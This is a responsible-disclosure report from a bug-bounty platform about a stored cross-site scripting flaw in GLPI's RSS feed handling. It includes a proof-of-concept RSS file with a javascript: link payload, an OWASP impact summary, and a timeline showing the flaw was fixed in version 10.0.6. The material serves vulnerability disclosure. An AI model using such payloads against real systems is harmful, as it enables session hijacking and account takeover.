XSS in RSS Description Link in glpi-project/glpi


Reported on

Nov 14th 2022


An Administrator can import a malicious RSS feed that contains Cross Site Scripting (XSS) payloads inside RSS links. Victims who wish to visit an RSS content and click on the link will execute the Javascript.

Proof of Concept

  1. Create a malicious RSS feeds

The XSS payload is inside items only in <description> attribute value :

<description>&lt;a href="javascript:alert(document.domain)" &gt;Click ME &lt;/a&gt;</description>

Content of payload.rss :

<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
<title>Home Title</title>
  <title>Item Title</title>
    &lt;a href="javascript:alert(document.domain)" &gt;Click ME &lt;/a&gt;
  1. Add RSS feed


  1. In content click on the link of the description


  1. XSS is executed



XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. The most severe XSS attacks involve disclosure of the user’s session cookie, allowing an attacker to hijack the user’s session and take over the account. Other damaging attacks include the disclosure of end user files, installation of Trojan horse programs, redirecting the user to some other page or site, or modifying presentation of content. An XSS vulnerability allowing an attacker to modify a press release or news item could affect a company’s stock price or lessen consumer confidence. An XSS vulnerability on a pharmaceutical site could allow an attacker to modify dosage information resulting in an overdose. Source OWASP - Cross Site Scripting (XSS). Source OWASP - Cross Site Scripting (XSS).

We are processing your report and will contact the glpi-project/glpi team within 24 hours. 5 months ago
We have contacted a member of the glpi-project/glpi team and are waiting to hear back 5 months ago
glpi-project/glpi maintainer has acknowledged this report 4 months ago
Alexandre Delaunay validated this vulnerability 4 months ago
Edra has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Cédric Anne gave praise 2 months ago
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
Cédric Anne marked this as fixed in 10.0.6 with commit aec5c2 2 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Cédric Anne published this vulnerability 2 months ago
RSSFeed.php#L859 has been validated
Cédric Anne
2 months ago



to join this conversation